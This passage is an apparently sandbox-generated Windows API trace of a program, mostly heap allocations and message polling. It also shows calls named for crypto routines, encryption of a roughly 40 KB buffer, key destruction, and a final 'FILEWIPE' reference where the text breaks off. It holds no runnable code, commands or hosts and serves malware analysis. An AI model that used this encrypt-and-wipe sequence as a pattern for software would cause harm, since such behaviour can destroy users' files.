(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.150] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.150] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.150] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.150] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.150] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.151] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.151] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0030.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.152] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.152] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.153] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x9dab, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x9db0) returned 1 [0030.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.153] CharLowerBuffW (in: lpsz="byte[40369]", cchLength=0xb | out: lpsz="byte[40369]") returned 0xb [0030.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.154] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.154] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.154] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.154] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8cd8e8*, pdwDataLen=0x6ae220*=0x9dab, dwBufLen=0x9db0 | out: pbData=0x8cd8e8*, pdwDataLen=0x6ae220*=0x9db0) returned 1 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.155] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.155] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.155] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.155] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.159] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.159] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.159] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.159] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.159] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.159] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0030.159] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.159] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.159] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.159] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.159] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.159] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.159] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.160] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.160] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.160] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.160] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.160] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.160] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.160] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.160] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.161] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.161] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.163] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.163] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 